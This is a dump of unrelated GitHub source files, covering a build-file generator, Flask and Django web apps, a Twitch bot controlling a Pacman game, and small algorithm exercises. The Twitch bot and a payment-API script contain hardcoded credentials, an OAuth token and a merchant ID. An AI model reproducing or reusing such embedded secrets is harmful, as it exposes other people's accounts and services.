implicit=self.ninja_gen_deps)\n n.newline()\n\n self._write_help()\n n.default('help')\n n.newline()\n\n self._write_clean()\n\n comparison_suffix = '-comparison.csv'\n n.rule('compare',\n command=[\n self.run_wrapper,\n os.path.join('.', self.gt_compilation['target']),\n '--compare-mode',\n '--compare-gt', self.gt_compilation['resultsfile'],\n '--suffix \"{}\"'.format(comparison_suffix),\n '$in',\n '-o /dev/null',\n ],\n description='COMPARE TO $out')\n n.newline()\n\n if self.gt_compilation is not None:\n self._write_compilation(self.gt_compilation)\n n.build('gt', 'phony', 'gtrun')\n n.newline()\n\n if self.dev_compilation is not None:\n self._write_compilation(self.dev_compilation)\n n.build('dev', 'phony', 'devrun')\n n.newline()\n\n runbuild_targets = ['gt']\n results_files = []\n for name, compiler in self.compilers.items():\n for optl in compiler['optimization_levels']:\n for switches in compiler['switches_list']:\n compilation = _create_compilation(\n compiler, optl, switches)\n runbuild_targets.append(compilation['target'])\n results_files.append(compilation['resultsfile'])\n self._write_compilation(compilation)\n n.newline()\n n.build('runbuild', 'phony', runbuild_targets)\n n.newline()\n\n for results_file in results_files:\n n.build(results_file + comparison_suffix, 'compare', results_file,\n implicit=[\n self.gt_compilation['resultsfile'],\n self.gt_compilation['target'],\n ])\n n.newline()\n n.build('run', 'phony', [x + comparison_suffix for x in results_files])\n\ndef main(arguments, prog=None):\n 'Main logic here'\n parser = populate_parser()\n if prog: parser.prog = prog\n args = parser.parse_args(arguments)\n arguments = [x for x in arguments if x not in ('-q', '--quiet')]\n\n with util.pushd(args.directory):\n if not args.quiet:\n if os.path.exists(BUILD_FILENAME):\n print('Updating', BUILD_FILENAME)\n else:\n print('Creating', BUILD_FILENAME)\n\n with open(BUILD_FILENAME, 'w') as build_file:\n writer = NinjaWriter(build_file, prog, arguments)\n writer.load_project_config('flit-config.toml')\n if os.path.isfile('custom.mk'):\n writer.load_makefile('custom.mk')\n writer.write()\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"PRUNERS/FLiT","sub_path":"scripts/flitcli/experimental/flit_ninja.py","file_name":"flit_ninja.py","file_ext":"py","file_size_in_byte":21391,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"4942770850","text":"import requests\r\n\r\n# api-endpoint\r\nURL = \"http://34.225.246.6/subscriptionToken.html\"\r\n \r\n# sending get request and saving the response as response object\r\nr = requests.get(url = URL)\r\n \r\n# printing the output\r\nprint(r)\r\n\r\nurl = \"https://api-uat.kushkipagos.com/subscriptions/v1/card/search/1658748120364000\"\r\n\r\nheaders = {\r\n 'Content-Type': \"application/json\",\r\n 'Private-Merchant-Id': \"064e0baa810a4191bcd23e0c46918f1b\"\r\n }\r\n\r\nresponse = requests.request(\"GET\", url, headers=headers)\r\n\r\nprint(response.text)\r\n","repo_name":"carlosponce/techleadtest","sub_path":"getSubscriptionInfo.py","file_name":"getSubscriptionInfo.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42961224025","text":"def pascal(n):\n if n == 1:\n return [[1]]\n elif n == 0:\n return []\n else:\n newrow = [1]\n result = pascal(n - 1)\n lastrow = result[-1]\n for i in range(len(lastrow)-1):\n newrow.append(lastrow[i] + lastrow[i + 1])\n newrow += [1]\n result.append(newrow)\n return result\n\n\nrows = int(input('input height: '))\nfor i in pascal(rows):\n print(i)\n","repo_name":"cyberskeleton/sandbox","sub_path":"2019-11-25cw3.py","file_name":"2019-11-25cw3.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13812168741","text":"import requests\nfrom flask import Flask, render_template, redirect, url_for, session\nfrom config import Config, CREATE_PAYMENT_LOG_MESSAGE\nimport json\nfrom datetime import datetime\n\n\nfrom forms import PaymentForm\nfrom additional import BASE_CURRENCIES,\\\n CREATE_BILL_URL, CREATE_INVOICE_URL, make_sign_string, PAYWAY_RUB\n\n\napp = Flask(__name__)\napp.config.from_object(Config)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef main_form():\n form = PaymentForm()\n if form.validate_on_submit():\n currency = BASE_CURRENCIES.get(form.currency.data)\n # eur/PAY\n if currency == 978:\n # create sign string\n data = {\n 'amount': form.amount.data,\n 'currency': currency,\n 'shop_id': 5,\n 'shop_order_id': 4126\n }\n sign = make_sign_string(data)\n data['description'] = form.description.data\n data['sign'] = sign\n session['data'] = data\n app.logger.info(CREATE_PAYMENT_LOG_MESSAGE.format('PAY', data['amount'], data['currency'],\n data['shop_order_id'], datetime.now(),\n data['description']))\n\n return redirect(url_for('accept_usd'))\n # usd/BILL\n elif currency == 840:\n # create sign string\n data = {\n 'shop_amount': str(form.amount.data),\n 'shop_currency': 840,\n 'shop_id': '5',\n 'shop_order_id': '123456',\n 'payer_currency': currency,\n }\n sign = make_sign_string(data)\n # maybe i should create function for creating request. But I thought it was redundant\n data['description'] = form.description.data\n data['sign'] = sign\n\n app.logger.info(CREATE_PAYMENT_LOG_MESSAGE.format('BILL', data['shop_amount'], data['payer_currency'],\n data['shop_order_id'], datetime.now(),\n data['description']))\n\n data = json.dumps(data)\n headers = {'Content-type': 'application/json'}\n response = requests.post(CREATE_BILL_URL, data=data, headers=headers)\n response_data = json.loads(response.content.decode('utf-8'))\n if response_data['result']:\n url = response_data['data']['url']\n return redirect(url)\n # rub/INVOICE\n elif currency == 643:\n # create sign string\n data = {\n \"amount\": str(form.amount.data),\n \"payway\": PAYWAY_RUB,\n 'shop_id': 5,\n 'shop_order_id': 123456,\n \"currency\": str(currency)\n }\n sign = make_sign_string(data)\n data['description'] = form.description.data\n data['sign'] = sign\n\n app.logger.info(CREATE_PAYMENT_LOG_MESSAGE.format('BILL', data['amount'], data['currency'],\n data['shop_order_id'], datetime.now(),\n data['description']))\n\n data = json.dumps(data)\n headers = {'Content-type': 'application/json'}\n response = requests.post(CREATE_INVOICE_URL, data=data, headers=headers)\n response_data = json.loads(response.content.decode('utf-8'))\n if response_data['result']:\n session['data'] = response_data\n return redirect(url_for('accept_rub'))\n return render_template('base_form.html', form=form)\n\n\n@app.route('/accept_usd')\ndef accept_usd():\n data = session.pop('data', None)\n return render_template('accept_usd.html', data=data)\n\n\n@app.route('/accept_rub')\ndef accept_rub():\n data = session.pop('data', None)['data']\n method = data['method']\n data = data['data']\n return render_template('accept_rub.html', data=data, method=method)\n\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"amurakho/flask_payment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20454023612","text":"import numpy as np\r\nfrom numba import jit\r\n\r\ndef compute_line_for_each_camera_pixel(line):\r\n n1 = np.array([line / np.linalg.norm(line)])\r\n import scipy.linalg\r\n yz = np.array([scipy.linalg.null_space(np.array([line])).T])\r\n return (n1,yz)\r\n\r\n\r\ndef points_to_RGB_and_depth_map(input):\r\n (height, res_div2, pcPoints_divided, pcColors_divided,depth,RGB_colors,yz,analysis_type)=input\r\n idx_len=0\r\n for j in range(height):\r\n pcPoints_sampled = np.array(pcPoints_divided[res_div2[0][idx_len:idx_len + res_div2[1][j]]])\r\n pcColors_sampled = np.array(pcColors_divided[res_div2[0][idx_len:idx_len + res_div2[1][j]]])\r\n idx_len += res_div2[1][j]\r\n if pcPoints_sampled.shape[0] == 0 or pcPoints_sampled.shape[1] == 0:\r\n depth[j] = 0\r\n # Y_coord[i, j]=0\r\n # Z_coord[i, j]=0\r\n RGB_colors[j, :] = [0, 0, 0]\r\n else:\r\n if analysis_type==\"rot\":\r\n idx_depth = np.argmin(np.sqrt((yz[j,0,:].T.dot(pcPoints_sampled.T))**2+(yz[j,1,:].T.dot(pcPoints_sampled.T))**2))\r\n else:\r\n idx_depth = np.argmin(np.sqrt(np.sum(pcPoints_sampled ** 2, axis=1)))\r\n depth[j] = pcPoints_sampled[idx_depth, 0]\r\n # Y_coord[i, j] = pcPoints_sampled[i, j][idx_depth, 1];\r\n # Z_coord[i, j] = pcPoints_sampled[i, j][idx_depth, 2];\r\n RGB_colors[j, :] = np.uint8(pcColors_sampled[idx_depth, :] * 255)\r\n return depth,RGB_colors\r\n\r\n\r\ndef divide_pc_for_img_gpu(input):\r\n (i, pcPoints, my_matrix)=input\r\n idx_points_5 = (pcPoints[:, 1] <= (my_matrix[0, i+1]) *\r\n pcPoints[:, 0]) &(pcPoints[:, 1]>= (my_matrix[0, i]) * pcPoints[:, 0])\r\n return idx_points_5\r\n\r\n\r\n@jit\r\ndef divide_each_row_per_pixel_gpu_gen(inputs):\r\n (px_idx, x_points)=inputs\r\n pcPoints_sampled = x_points[px_idx]\r\n if pcPoints_sampled.shape[0] != 0:\r\n idx_depth = np.argmin(pcPoints_sampled)\r\n depth = pcPoints_sampled[idx_depth]\r\n return depth\r\n else:\r\n return 0\r\n\r\n\r\n","repo_name":"DanieleMarchisotti/virtual_benchmark_SLAM_3D","sub_path":"create_new_dataset/python/process_function_test.py","file_name":"process_function_test.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74502947607","text":"import numpy as np\nimport pandas as pd\n\n# -----------------------------------\n# 데이터 등 준비\n# -----------------------------------\n# 데이터 ��어오기\ntrain = pd.read_csv('../input/ch03/multi_table_train.csv')\nproduct_master = pd.read_csv('../input/ch03/multi_table_product.csv')\nuser_log = pd.read_csv('../input/ch03/multi_table_log.csv')\n\n# -----------------------------------\n# 앞에서 설명한 그림 형식의 데이터 프레임이 있다고 가정\n# train: 학습 데이터(사용자 ID, 상품 ID, 목적변수 등의 열이 있음)\n# product_master: 상품 마스터(상품 ID와 상품의 정보를 나타내는 열이 있음)\n# user_log: 사용자 행동의 로그 데이터(사용자 ID와 각 행동의 정보를 나타내는 열이 있음)\n\n# 학습 데이터와 상품 마스터 데이터의 결합\ntrain = train.merge(product_master, on='product_id', how='left')\n\n# 로그 데이터의 사용자별 행의 수를 구하여, 학습 데이터와 결합\nuser_log_agg = user_log.groupby('user_id').size().reset_index().rename(columns={0: 'user_count'})\ntrain = train.merge(user_log_agg, on='user_id', how='left')\n","repo_name":"LDJWJ/kagglebook","sub_path":"ch03/ch03-03-multi_tables.py","file_name":"ch03-03-multi_tables.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"ko","doc_type":"code","stars":20,"dataset":"github-code","pt":"31"} +{"seq_id":"37288447197","text":"import logging\nimport sys\n\nfrom asyncio.events import AbstractEventLoop\nfrom asyncio.tasks import create_task\nfrom overseer import capture, get_score\nimport requests\nimport threading\nfrom twitchio.ext import commands\nimport win32gui\nimport win32api\nimport win32con\n\nimport asyncio\nimport time\n\nfrom ctypes import windll\n\nfrom overseer_t import run\n\nlogging.basicConfig(\n stream=sys.stdout,\n format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n level=logging.INFO)\n\n\nclass Bot(commands.Bot):\n is_ready = False\n\n def __init__(self, window_handler=None):\n self.hwnd = window_handler\n # Initialise our Bot with our access token, prefix and a list of channels to join on boot...\n super().__init__(token='oauth:60jeclq4fu9031b4ffxidnd2r5jxgp',\n prefix=['!', '~'], initial_channels=['nguyenntt'])\n\n async def event_ready(self):\n # We are logged in and ready to chat and use commands...\n print(f'Logged in as | {self.nick}')\n self.is_ready = True\n\n @commands.command()\n async def goUp(self, ctx: commands.Context):\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYDOWN,\n win32con.VK_UP,\n int(0x01480001))\n time.sleep(0.2)\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYUP,\n win32con.VK_UP,\n int(0xC1480001))\n return 0\n\n @commands.command()\n async def goRight(self, ctx: commands.Context):\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYDOWN,\n win32con.VK_RIGHT,\n int(0x01480001))\n time.sleep(0.2)\n\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYUP,\n win32con.VK_RIGHT,\n int(0xC1480001))\n return 0\n\n @commands.command()\n async def goLeft(self, ctx: commands.Context):\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYDOWN,\n win32con.VK_LEFT,\n int(0x01480001))\n time.sleep(0.2)\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYUP,\n win32con.VK_LEFT,\n int(0xC1480001))\n return 0\n\n @commands.command()\n async def goDown(self, ctx: commands.Context):\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYDOWN,\n win32con.VK_DOWN,\n int(0x01480001))\n time.sleep(0.2)\n win32api.PostMessage(self.hwnd,\n win32con.WM_KEYUP,\n win32con.VK_DOWN,\n int(0xC1480001))\n return 0\n\n @commands.command()\n async def hello(self, ctx: commands.Context):\n # Send a hello back!\n await ctx.send(f'Hello {ctx.author.name}!')\n\n async def event_message(self, message):\n if message.echo:\n return\n\n print(f'Said {message.content}')\n\n await self.handle_commands(message)\n\n\ncur_player = None\nlast_scores = [0, 0]\n\n\nasync def track_round(bot: Bot):\n global cur_player\n global last_scores\n logging.info('track_round running - END_ROUND ...')\n res = requests.get('https://apg-api-g2.herokuapp.com/round')\n\n if res.status_code != 200:\n logging.error(f'Election failed, err=%s', res.text)\n return False\n\n new_player = res.text\n if bot.is_ready:\n ws = bot.get_channel('nguyenntt')\n if cur_player:\n await ws.send(f'?end {cur_player} {int(last_scores[1]) - int(last_scores[0])}')\n\n await ws.send(f'?elect {new_player}')\n cur_player = new_player\n return True\n\n return False\n\n\nscore_post_count = 0\n\n\nasync def track_score(hwnd, bot):\n global last_scores\n global score_post_count\n score_post_count += 1\n\n logging.info(f\"score_task running...\")\n\n img = capture(hwnd)\n scores = get_score(img)\n\n if scores is None:\n return\n\n if (scores[0] and scores[1]):\n last_scores = [scores[0], scores[1]]\n\n if score_post_count % 5 == 0:\n score_post_count = 1\n requests.post('https://apg-api-g2.herokuapp.com/score',\n data={\n 'pm': scores[0],\n 'gh': scores[1]\n })\n if bot.is_ready:\n ws = bot.get_channel('nguyenntt')\n await ws.send(f'?score {scores[0]} {scores[1]}')\n return True\n\n\nasync def track_tasks(hwnd, bot: Bot):\n i = 0\n while True:\n await track_score(hwnd, bot)\n\n if not i % 20:\n if await track_round(bot):\n i = 0\n else:\n i -= 1 # retry\n\n await asyncio.sleep(3)\n i += 1\n\n\ndef create_daemon(ev_loop: AbstractEventLoop, hwnd, bot: Bot):\n logging.info(\"Creating daemon tasks...\")\n asyncio.set_event_loop(ev_loop)\n task = asyncio \\\n .get_event_loop() \\\n .create_task(track_tasks(hwnd, bot))\n\n try:\n ev_loop.run_until_complete(task)\n except asyncio.CancelledError as e:\n logging.error(f\"Error: {e.__cause__}\")\n except KeyboardInterrupt:\n logging.error(\"Interrupted!!!\")\n except Exception as e:\n logging.exception(e)\n\n\ndef main():\n try:\n event_loop_score = asyncio.new_event_loop()\n\n hwnd = win32gui.FindWindow(0, 'Pacman')\n bot = Bot(hwnd)\n\n threading.Thread(\n target=create_daemon,\n args=(event_loop_score, hwnd, bot),\n daemon=True).start()\n\n threading.Thread(\n target=run,\n args=(hwnd,),\n daemon=True).start()\n\n bot.run()\n except KeyboardInterrupt:\n print('Interrupted!!!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nguyenntt97/RU_APG","sub_path":"apg_project/group2_apg/final/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17304060431","text":"class Solution(object):\n MOVE = [[0, 1], [1, 0], [0, -1], [-1, 0]]\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n if not board:\n if word == \"\":\n return True\n return False\n\n N, M = len(board), len(board[0])\n visited = [[False,] * M for i in range(N)]\n\n def dfs(x, y, index):\n if index >= len(word):\n return True\n if x < 0 or x >= N or y < 0 or y >= M or visited[x][y]:\n return False\n if board[x][y] != word[index]:\n return False\n visited[x][y] = True\n for move_x, move_y in self.MOVE:\n new_x, new_y = x + move_x, y + move_y\n if dfs(new_x, new_y, index + 1):\n return True\n visited[x][y] = False\n return False\n\n for i in range(N):\n for j in range(M):\n if dfs(i, j, 0):\n return True\n return False\n\nt = Solution()\nboard = [\n ['o','a','a','n'],\n ['e','t','a','e'],\n ['i','h','k','r'],\n ['i','f','l','v']\n]\nword = \"oath\"\nassert(t.exist(board, word))\n\nboard = [\n ['A','B','C','E'],\n ['S','F','C','S'],\n ['A','D','E','E']\n]\nword = \"ABCCED\"\nassert(t.exist(board, word))\nword = \"SEE\"\nassert(t.exist(board, word))\nword = \"ABCB\"\nassert(not t.exist(board, word))\n\nprint(\"tests passed\")\n","repo_name":"dsdshcym/LeetCode-Solutions","sub_path":"algorithms/word_search.py","file_name":"word_search.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6852062737","text":"white_pieces=[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]\r\nwhite_start_position=[\"h7\",\"g7\",\"f7\",\"e7\",\"d7\",\"c7\",\"b7\",\"a7\",\"h8\",\"g8\",\"f8\",\"e8\",\"d8\",\"c8\",\"b8\",\"a8\"]\r\nblack_pieces=[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]\r\nblack_start_position=[\"h2\",\"g2\",\"f2\",\"e2\",\"d2\",\"c2\",\"b2\",\"a2\",\"h1\",\"g1\",\"f1\",\"e1\",\"d1\",\"c1\",\"b1\",\"a1\"]\r\n\r\ndef piece_decision():\r\n global white_start_position,black_start_position\r\n piece=input(\"What piece would you like to move:\")\r\n start_position=input(\"What position is that piece:\")\r\n end_position=input(\"What position would you like to move too:\")\r\n piece_index=white_start_position.index(start_position.lower())\r\n return piece,start_position,end_position,piece_index\r\n\r\ndef pawn_move(piece):\r\n if piece.lower == \"pawn\":\r\n f\r\n\r\ndef piece_check(piece):\r\n pawn_move(piece)\r\n #bishop_move(piece)\r\n #rook_move(piece)\r\n #queen_move(piece)\r\n #king_move(piece)\r\n #knight_move(piece)\r\n\r\ndef main():\r\n piece,start_position,end_position,piece_index=piece_decision()\r\n piece_check(piece)\r\n print(piece_index)\r\nmain()","repo_name":"JamesBenjamin1028/test","sub_path":"Chess.py","file_name":"Chess.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69985875927","text":"import logging\nimport os\n\nfrom distutils.util import strtobool\n\nlogger = logging.getLogger(__name__)\n\nKAFKA_BOOTSTRAP_SERVER = os.getenv(\"KAFKA_BROKER_URL\")\nSTORE_URI = os.getenv(\"STORE_URI\", \"memory://\")\n\nTOPIC_ALLOW_DECLARE = strtobool(os.getenv(\"TOPIC_ALLOW_DECLARE\", \"True\"))\nTOPIC_DISABLE_LEADER = strtobool(os.getenv(\"TOPIC_DISABLE_LEADER\", \"False\"))\n\nSSL_ENABLED = False\nSSL_CONTEXT = None\nOFFSET_ACK_ON_KAFKA = strtobool(os.getenv(\"OFFSET_ACK_ON_KAFKA\", \"True\"))\n\nDEBUG = strtobool(os.getenv(\"DEBUG\", \"False\"))\nMAX_BUFFER_SIZE = int(os.getenv(\"MAX_BUFFER_SIZE\", 50000))\n\nLOGGING = {\n \"disable_existing_loggers\": False,\n \"merge\": True,\n \"formatters\": {\n 'colored': {\n '()': 'mode.utils.logging.DefaultFormatter',\n 'format': \"%(asctime)s | %(module)s | %(levelname)s | %(funcName)s | %(message)s\",\n },\n 'default': {\n '()': 'mode.utils.logging.DefaultFormatter',\n 'format': \"%(asctime)s | %(filename)s | %(levelname)s | %(funcName)s | %(message)s\",\n }\n }\n}\n\nTOPIC_PARTITION = os.getenv(\"TOPIC_PARTITION\", 8)\n\nTRX_TOPIC = os.getenv(\"TRANSACTIONS_TOPIC\")\n","repo_name":"arezamoosavi/redbus-data-warehouse-pipeline","sub_path":"pie/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12049861142","text":"class game:\n\tlife=3\n\tdef shoot(self):\n\t\tprint('Ouch')\n\t\tself.life -=1\n\tdef current_life(self):\n\t\tif (self.life<=0):\n\t\t\tprint('I am dead')\n\t\telse:\n\t\t\tprint(str(self.life)+' life left')\n\nplayer1 = game()\nplayer2=game()\nplayer1.shoot()\nplayer1.current_life()\nplayer2.current_life()\n","repo_name":"arpitanand89/MyCode","sub_path":"Coursera/class_test.py","file_name":"class_test.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41887572479","text":"import requests\nfrom pprint import pprint\n\n\nclass YaUploader:\n host = 'https://cloud-api.yandex.net:443'\n\n def __init__(self, token: str):\n self.token = token\n\n def get_headers(self):\n return {\n 'Content-Type': 'application/json',\n 'Authorization': f'OAuth {self.token}'\n }\n\n def upload(self, file_path: str, file_name):\n upload_link = self._get_upload_link(file_path)\n headers = self.get_headers()\n response = requests.put(upload_link, data=open(file_name, 'rb'), headers=headers)\n response.raise_for_status()\n if response.status_code == 201:\n print('Success')\n\n def _get_upload_link(self, path):\n url = f'{self.host}/v1/disk/resources/upload/'\n headers = self.get_headers()\n params = {'path': path, 'overwrite': True}\n response = requests.get(url, params=params, headers=headers)\n pprint(response.json())\n return response.json().get('href')\n\nif __name__ == '__main__':\n file_name = 'test.txt'\n path_to_file = \"/test.txt\"\n token = ''\n uploader = YaUploader(token)\n result = uploader.upload(path_to_file, file_name)","repo_name":"Zireael112/API_yandexdisk","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74704019288","text":"import cv2\nimport numpy as np\n\nprint(\"OpenCV version:\", cv2.__version__)\n\nimg = cv2.imread('/home/ahu/Workspace/py-video-processing-rsc/opencv-master/samples/data/gradient.png', 0)\n\n# Get the threshold information\n# args : img, threshold value, maximum value, threshold type\nret, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\n# If the value is lesser than 127, the value is set to 0, else, to 255\nret, th2 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV)\n# The inverse result of THRESH_BINARY\nret, th3 = cv2.threshold(img, 127, 255, cv2.THRESH_TRUNC)\n# If the value is greater than 127, it is set to 127\nret, th4 = cv2.threshold(img, 127, 255, cv2.THRESH_TOZERO)\n# If the value is lesser than 127, it is set to 0\nret, th5 = cv2.threshold(img, 127, 255, cv2.THRESH_TOZERO_INV)\n# The inverse result of THRESH_TOZERO\n\ncv2.imshow(\"Image\", img)\ncv2.imshow(\"th1\", th1)\ncv2.imshow(\"th2\", th2)\ncv2.imshow(\"th3\", th3)\ncv2.imshow(\"th4\", th4)\ncv2.imshow(\"th5\", th5)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"Karma-Team/py-video-processing","sub_path":"examples/14_simple_thresholding_opencv_python.py","file_name":"14_simple_thresholding_opencv_python.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10247612250","text":"def validator(s, func):\n ans = False\n for i in range(0, len(s)):\n if s[i].func:\n ans = True\n break\n return ans\n\n\n# functions = {\n# 1: islower\n# }\nres = validator('qa2', func='qa2'.islower)\nprint(res)","repo_name":"eshah-hamid123/Python-Projects","sub_path":"hackerrank/string validator 2.py","file_name":"string validator 2.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3123747032","text":"'''Sort the array firstly and use two pointers to track from left to right.\nIf nums[i] + nums[left] + nums[right] == 0, add them to the result.\nBut we need to prevent the repeated situation. There are three situations can cause repeat:\n1) i>0 and nums[i] == nums[i-1], we should skip this iter.\n2) left < right and nums[left] == nums[left-1] after left += 1, we should get the next iter value.\n3) left < right and nums[right] == nums[right+1], same as second situation.'''\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if len(nums) < 3:\n return []\n res = []\n nums.sort()\n for i in range(len(nums) - 2):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n left = i + 1\n right = len(nums) - 1\n while left < right:\n s = nums[i] + nums[left] + nums[right]\n if s == 0:\n res.append([nums[i],nums[left],nums[right]])\n left += 1\n right -= 1\n while left < right and nums[left] == nums[left-1]:\n left += 1\n while left < right and nums[right] == nums[right+1]:\n right -= 1\n elif s < 0:\n left += 1\n else:\n right -= 1\n return res\n","repo_name":"tr1503/LeetCode","sub_path":"Two Points/3sum.py","file_name":"3sum.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13383536243","text":"# -*- encoding: utf-8 -*-\nimport json\nfrom django import template\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import redirect\nfrom django.template import loader\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .db_actions import check_ban, get_points, get_unchecked, update_point, save_point, drop_point, ban_user, check_key, check_spam\n\nmapbox_access_token = 'pk.eyJ1IjoidGl6aHByb2dlciIsImEiOiJjbDN2dXB3bmYxdjYyM2lsdHZwZjRhbmJwIn0.LrtqGvP5I0RhbKjyVpDbwA'\n\n\ndef home(request):\n context = {}\n if not request.user.is_authenticated:\n context['auth'] = False\n context['staff'] = False\n context['superuser'] = False\n context['page_name'] = 'Guest'\n context['mapbox_access_token'] = mapbox_access_token\n html_template = loader.get_template('home/map.html')\n return HttpResponse(html_template.render(context, request))\n else:\n return redirect('/map.html')\n\n\n@login_required(login_url=\"/login/\")\ndef main(request):\n context = {}\n context['auth'] = False\n context['staff'] = False\n context['superuser'] = False\n context['segment'] = 'map'\n context['mapbox_access_token'] = mapbox_access_token\n context['user_name'] = request.user.username\n context['page_name'] = 'Map'\n\n if request.user.is_staff or request.user.is_superuser:\n context['staff'] = True\n context['page_name'] = 'Map admin'\n\n elif request.user.is_authenticated:\n context['auth'] = True\n \n try:\n html_template = loader.get_template('home/map.html')\n return HttpResponse(html_template.render(context, request))\n except template.TemplateDoesNotExist:\n html_template = loader.get_template('home/page-404.html')\n return HttpResponse(html_template.render(context, request))\n\n except:\n html_template = loader.get_template('home/page-500.html')\n return HttpResponse(html_template.render(context, request))\n\n\ndef getPoints(request):\n if request.method == 'GET':\n return JsonResponse(get_points())\n else:\n response = JsonResponse({'error': 'Condition check not satisfied, permission error'})\n response.status_code = 403\n return response\n\n\ndef getUnchecked(request):\n if request.method == 'GET':\n return JsonResponse(get_unchecked())\n else:\n response = JsonResponse({'error': 'Condition check not satisfied, permission error'})\n response.status_code = 403\n return response\n\n\ndef savePoint(request):\n if request.method == 'POST' and (request.user.is_superuser or request.user.is_staff or request.user.is_authenticated):\n if check_ban(request.user):\n response = JsonResponse({'error': 'You can not add points, you are banned!'})\n response.status_code = 500\n return response\n \n if check_spam(request.user) and not (request.user.is_superuser or request.user.is_staff):\n response = JsonResponse({'error': 'You can not add more points, wait confirmation of others!'})\n response.status_code = 500\n return response\n\n data = json.loads(request.body)\n res = save_point(lat=data['latitude'], lng=data['longtitude'], desc=data['description'], adrs=data['address'], threat=data['threat'], checked=data['checked'], user=request.user)\n if res:\n return HttpResponse(200)\n response = JsonResponse({'error': 'Something wrong on server side, oooops...'})\n response.status_code = 500\n return response\n else:\n response = JsonResponse({'error': 'Condition check not satisfied, permission error'})\n response.status_code = 403\n return response\n\n \n@csrf_exempt\ndef institutePoint(request, key):\n print(key)\n if request.method == 'POST' and check_key(key):\n data = json.loads(request.body)\n if save_point(lat=data['latitude'], lng=data['longtitude'], desc=data['description'], adrs=data['address'], threat=data['threat'], bkey=key):\n return HttpResponse(200)\n response = JsonResponse({'error': 'Something wrong on server side, oooops...'})\n response.status_code = 500\n return response\n else:\n response = JsonResponse({'error': 'Not authorized request...'})\n response.status_code = 403\n return response\n\n\ndef updatePoint(request):\n if request.method == 'POST' and (request.user.is_superuser or request.user.is_staff):\n data = json.loads(request.body)\n res = update_point(data['old_latitude'], data['old_longtitude'], data['latitude'], data['longtitude'], data['description'], data['address'], data['threat'], data['checked'])\n if res:\n return HttpResponse(200)\n response = JsonResponse({'error': 'Something wrong on server side, oooops...'})\n response.status_code = 500\n return response\n else:\n response = JsonResponse({'error': 'Condition check not satisfied, permission error'})\n response.status_code = 403\n return response\n\n\ndef deletePoint(request):\n if request.method == 'DELETE' and (request.user.is_superuser or request.user.is_staff):\n data = json.loads(request.body)\n if drop_point(data['latitude'], data['longtitude']):\n return HttpResponse(200)\n response = JsonResponse({'error': 'Something wrong on server side, oooops...'})\n response.status_code = 500\n return response\n else:\n response = JsonResponse({'error': 'Condition check not satisfied, permission error'})\n response.status_code = 403\n return response\n\n\ndef banUser(request):\n if request.method == 'DELETE' and (request.user.is_superuser or request.user.is_staff):\n data = json.loads(request.body)\n res = ban_user(data['latitude'], data['longtitude'], data['reason'])\n if res == True:\n return HttpResponse(200)\n else:\n response = JsonResponse({'error': res})\n response.status_code = 500\n return response\n else:\n response = JsonResponse({'error': 'Condition check not satisfied, permission error'})\n response.status_code = 403\n return 